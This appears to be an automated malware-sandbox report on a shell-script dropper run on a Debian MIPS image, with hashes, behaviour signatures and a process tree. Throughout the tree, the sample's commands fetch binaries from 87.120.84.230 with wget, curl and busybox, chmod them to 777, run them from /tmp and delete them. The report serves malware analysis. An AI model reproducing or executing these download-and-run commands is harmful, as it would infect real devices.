Analysis
-
max time kernel
65s -
max time network
67s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:01
Static task
static1
Behavioral task
behavioral1
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
-
Size
10KB
-
MD5
688ca450547096f076169e59bab218e1
-
SHA1
2187af4719b3b2f94b20e5e3ad20b8222bc077ac
-
SHA256
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127
-
SHA512
4b9aa7e6693587d69eb70d43f25242123a62a6acd4b0c3bedd1533f2afb49f99d44f26bb6c17dbcf9ca11f2d689e80cccb1df2447fa39a4541d82c23b2c13b0c
-
SSDEEP
192:2e6/8cxOOD6Ock1sDEQ9OuNUMEQ9Oure6/8cbOOD6O9:2e6/8cxOOD6Ock1sDEQ9OuNUMEQ9OurZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh/tmp/005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:719
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:741
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:747
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:756
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:757
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:771
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:778
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:781
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:782
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:799
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:810
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:816
-
-
/bin/chmodchmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:843
-
-
/bin/chmodchmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:853
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:855
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:858
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:867
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:873
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:879
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:885
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:891
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:897
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:903
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:909
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:915
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:921
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:927
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:933
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:939
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:945
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:951
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:957
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:963
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:969
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:975
-
-
/bin/chmodchmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:981
-
-
/bin/chmodchmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:984
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97